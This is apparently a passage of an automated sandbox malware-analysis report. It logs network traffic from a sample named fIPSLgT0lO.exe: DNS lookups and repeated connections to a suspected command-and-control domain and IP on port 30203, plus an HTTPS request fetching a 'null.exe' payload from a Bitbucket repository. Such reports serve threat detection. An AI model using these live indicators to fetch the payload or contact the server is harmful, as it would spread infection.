                                                                                    Dec 12, 2024 17:50:08.760987997 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:08.769364119 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:08.811340094 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:09.396163940 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:09.396220922 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:09.396238089 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:09.396250010 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:09.396270990 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:09.396373987 CET44349731185.166.143.49192.168.2.4
                                                                                    Dec 12, 2024 17:50:09.396416903 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:09.404021025 CET49731443192.168.2.4185.166.143.49
                                                                                    Dec 12, 2024 17:50:09.527475119 CET4973230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:09.647420883 CET3020349732181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:09.647517920 CET4973230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:09.648344994 CET4973230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:09.768630981 CET3020349732181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:09.768738985 CET4973230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:09.888577938 CET3020349732181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:11.022254944 CET3020349732181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:11.022325993 CET4973230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:11.022500038 CET4973230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:11.136825085 CET4973430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:11.142304897 CET3020349732181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:11.257060051 CET3020349734181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:11.257179976 CET4973430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:11.257967949 CET4973430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:11.377861023 CET3020349734181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:11.377935886 CET4973430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:11.503501892 CET3020349734181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:12.618432999 CET3020349734181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:12.618623018 CET4973430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:12.618824005 CET4973430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:12.730964899 CET4973630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:12.739614964 CET3020349734181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:12.850972891 CET3020349736181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:12.851063013 CET4973630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:12.851831913 CET4973630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:12.971878052 CET3020349736181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:12.971950054 CET4973630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:13.092207909 CET3020349736181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:17.294926882 CET3020349736181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:17.297765970 CET4973630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:17.297964096 CET4973630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:17.402992010 CET4974030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:17.418282986 CET3020349736181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:17.522810936 CET3020349740181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:17.522912025 CET4974030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:17.523900986 CET4974030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:17.643877029 CET3020349740181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:17.643965960 CET4974030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:17.766839027 CET3020349740181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:18.889946938 CET3020349740181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:18.890043974 CET4974030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:18.890269041 CET4974030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:18.996721983 CET4974130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:19.010046005 CET3020349740181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:19.120836020 CET3020349741181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:19.121058941 CET4974130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:19.121969938 CET4974130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:19.247911930 CET3020349741181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:19.247965097 CET4974130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:19.367595911 CET3020349741181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:41.030113935 CET3020349741181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:41.030169964 CET4974130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:41.030314922 CET4974130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:41.150068998 CET3020349741181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:41.996521950 CET4974330203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:42.116600037 CET3020349743181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:42.116769075 CET4974330203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:42.117712975 CET4974330203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:42.237829924 CET3020349743181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:42.237993002 CET4974330203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:42.358318090 CET3020349743181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:43.472083092 CET3020349743181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:43.472134113 CET4974330203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:43.472306013 CET4974330203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:43.574503899 CET4974430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:43.593188047 CET3020349743181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:43.882448912 CET3020349744181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:43.882669926 CET4974430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:43.883466005 CET4974430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:44.003361940 CET3020349744181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:44.003416061 CET4974430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:44.127969980 CET3020349744181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:54.250351906 CET3020349744181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:54.250725031 CET4974430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:54.250725985 CET4974430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:54.355473995 CET4975230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:54.370554924 CET3020349744181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:54.475336075 CET3020349752181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:54.476144075 CET4975230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:54.476797104 CET4975230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:54.599030018 CET3020349752181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:50:54.599090099 CET4975230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:50:54.719794035 CET3020349752181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:16.374509096 CET3020349752181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:16.374588966 CET4975230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:16.374783039 CET4975230203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:16.497550964 CET3020349752181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:19.331962109 CET4980930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:19.452645063 CET3020349809181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:19.452883005 CET4980930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:19.453907013 CET4980930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:19.573760986 CET3020349809181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:19.573828936 CET4980930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:19.694021940 CET3020349809181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:20.833015919 CET3020349809181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:20.833082914 CET4980930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:20.833236933 CET4980930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:20.949670076 CET4981430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:20.952950001 CET3020349809181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:21.069556952 CET3020349814181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:21.069689035 CET4981430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:21.070429087 CET4981430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:21.190404892 CET3020349814181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:21.190511942 CET4981430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:21.310720921 CET3020349814181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:22.448904991 CET3020349814181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:22.449156046 CET4981430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:22.449321032 CET4981430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:22.558777094 CET4981930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:22.569006920 CET3020349814181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:22.679279089 CET3020349819181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:22.679538965 CET4981930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:22.680982113 CET4981930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:22.801625013 CET3020349819181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:22.801728964 CET4981930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:22.921509981 CET3020349819181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:24.046185970 CET3020349819181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:24.046508074 CET4981930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:24.046508074 CET4981930203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:24.152781010 CET4982430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:24.167187929 CET3020349819181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:24.272486925 CET3020349824181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:24.272643089 CET4982430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:24.273403883 CET4982430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:24.393198967 CET3020349824181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:24.393316984 CET4982430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:24.513330936 CET3020349824181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:25.673912048 CET3020349824181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:25.673996925 CET4982430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:25.674139023 CET4982430203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:25.778022051 CET4982730203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:25.794531107 CET3020349824181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:25.897901058 CET3020349827181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:25.897981882 CET4982730203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:25.898863077 CET4982730203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:26.020956039 CET3020349827181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:26.021095037 CET4982730203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:26.146353960 CET3020349827181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:27.137425900 CET4982730203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:27.257369995 CET3020349827181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:27.257487059 CET4982730203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:27.378989935 CET3020349827181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:30.386058092 CET3020349827181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:30.386142969 CET4982730203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:30.386285067 CET4982730203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:30.496434927 CET4984030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:30.506021976 CET3020349827181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:30.616475105 CET3020349840181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:30.616575003 CET4984030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:30.617315054 CET4984030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:30.739357948 CET3020349840181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:30.741883039 CET4984030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:30.861802101 CET3020349840181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:35.007029057 CET3020349840181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:35.007102966 CET4984030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:35.007330894 CET4984030203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:35.121424913 CET4985130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:35.127135992 CET3020349840181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:35.241590023 CET3020349851181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:35.241679907 CET4985130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:35.242362976 CET4985130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:35.362960100 CET3020349851181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:35.363018990 CET4985130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:35.483021975 CET3020349851181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:36.606431007 CET3020349851181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:36.608167887 CET4985130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:36.608169079 CET4985130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:36.729890108 CET3020349851181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:36.730906963 CET4985530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:36.850693941 CET3020349855181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:36.850786924 CET4985530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:36.851454020 CET4985530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:36.971221924 CET3020349855181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:36.971287966 CET4985530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:37.091109037 CET3020349855181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:39.559037924 CET4985530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:39.680008888 CET3020349855181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:39.680079937 CET4985530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:39.800280094 CET3020349855181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:42.368285894 CET3020349855181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:42.370104074 CET4985530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:42.370259047 CET4985530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:42.480906010 CET4987130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:42.490174055 CET3020349855181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:42.601361990 CET3020349871181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:42.601644993 CET4987130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:42.602359056 CET4987130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:42.722265959 CET3020349871181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:42.725281000 CET4987130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:42.845309973 CET3020349871181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:43.918452024 CET4987130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:43.945029974 CET3020349871181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:43.945084095 CET4987130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:43.945216894 CET4987130203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:44.038764954 CET3020349871181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:44.059215069 CET4987530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:44.066812992 CET3020349871181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:44.066833019 CET3020349871181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:44.313962936 CET3020349875181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:44.317975044 CET4987530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:44.320785046 CET4987530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:44.443219900 CET3020349875181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:44.445904970 CET4987530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:44.568818092 CET3020349875181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:44.731817007 CET4987530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:44.889703989 CET3020349875181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:44.890221119 CET4987530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:45.010555029 CET3020349875181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:48.852334023 CET3020349875181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:48.852404118 CET4987530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:48.852560997 CET4987530203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:48.974116087 CET3020349875181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:53.895162106 CET4989630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:54.015352964 CET3020349896181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:54.015459061 CET4989630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:54.016386032 CET4989630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:54.152518988 CET3020349896181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:54.152616978 CET4989630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:54.277184963 CET3020349896181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:58.026845932 CET4989630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:58.146779060 CET3020349896181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:58.146892071 CET4989630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:58.266777992 CET3020349896181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:58.385570049 CET3020349896181.131.217.244192.168.2.4
                                                                                    Dec 12, 2024 17:51:58.385819912 CET4989630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:58.385821104 CET4989630203192.168.2.4181.131.217.244
                                                                                    Dec 12, 2024 17:51:58.505896091 CET3020349896181.131.217.244192.168.2.4

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 12, 2024 17:49:54.027766943 CET5197253192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:49:55.042582035 CET5197253192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:49:55.792690992 CET53519721.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:49:55.792704105 CET53519721.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:50:06.737159967 CET5480353192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:50:06.877274036 CET53548031.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:50:41.137655973 CET5244053192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:50:41.995749950 CET53524401.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:51:16.480863094 CET5223853192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:51:17.495599031 CET5223853192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:51:18.511224985 CET5223853192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:51:19.330806971 CET53522381.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:51:19.330840111 CET53522381.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:51:19.330849886 CET53522381.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:51:48.965157986 CET5646053192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:51:49.964440107 CET5646053192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:51:50.980417013 CET5646053192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:51:52.980045080 CET5646053192.168.2.41.1.1.1
                                                                                    Dec 12, 2024 17:51:53.892133951 CET53564601.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:51:53.892209053 CET53564601.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:51:53.892219067 CET53564601.1.1.1192.168.2.4
                                                                                    Dec 12, 2024 17:51:53.892723083 CET53564601.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 12, 2024 17:49:54.027766943 CET192.168.2.41.1.1.10xb010Standard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:49:55.042582035 CET192.168.2.41.1.1.10xb010Standard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:50:06.737159967 CET192.168.2.41.1.1.10x7e9eStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:50:41.137655973 CET192.168.2.41.1.1.10xcb5eStandard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:16.480863094 CET192.168.2.41.1.1.10xe39dStandard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:17.495599031 CET192.168.2.41.1.1.10xe39dStandard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:18.511224985 CET192.168.2.41.1.1.10xe39dStandard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:48.965157986 CET192.168.2.41.1.1.10xcea3Standard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:49.964440107 CET192.168.2.41.1.1.10xcea3Standard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:50.980417013 CET192.168.2.41.1.1.10xcea3Standard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:52.980045080 CET192.168.2.41.1.1.10xcea3Standard query (0)formationslistcomplet2.sexidude.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 12, 2024 17:49:55.792690992 CET1.1.1.1192.168.2.40xb010No error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:49:55.792704105 CET1.1.1.1192.168.2.40xb010No error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:50:06.877274036 CET1.1.1.1192.168.2.40x7e9eNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:50:06.877274036 CET1.1.1.1192.168.2.40x7e9eNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:50:06.877274036 CET1.1.1.1192.168.2.40x7e9eNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:50:41.995749950 CET1.1.1.1192.168.2.40xcb5eNo error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:19.330806971 CET1.1.1.1192.168.2.40xe39dNo error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:19.330840111 CET1.1.1.1192.168.2.40xe39dNo error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:19.330849886 CET1.1.1.1192.168.2.40xe39dNo error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:53.892133951 CET1.1.1.1192.168.2.40xcea3No error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:53.892209053 CET1.1.1.1192.168.2.40xcea3No error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:53.892219067 CET1.1.1.1192.168.2.40xcea3No error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false
                                                                                    Dec 12, 2024 17:51:53.892723083 CET1.1.1.1192.168.2.40xcea3No error (0)formationslistcomplet2.sexidude.com181.131.217.244A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • bitbucket.org

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449731185.166.143.494433020C:\Users\user\Desktop\fIPSLgT0lO.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-12 16:50:08 UTC101OUTGET /facturacioncol/fact/downloads/null.exe HTTP/1.1
                                                                                    Host: bitbucket.org
                                                                                    Connection: Keep-Alive
                                                                                    2024-12-12 16:50:09 UTC5939INHTTP/1.1 302 Found
                                                                                    Date: Thu, 12 Dec 2024 16:50:09 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 0
                                                                                    Server: AtlassianEdge
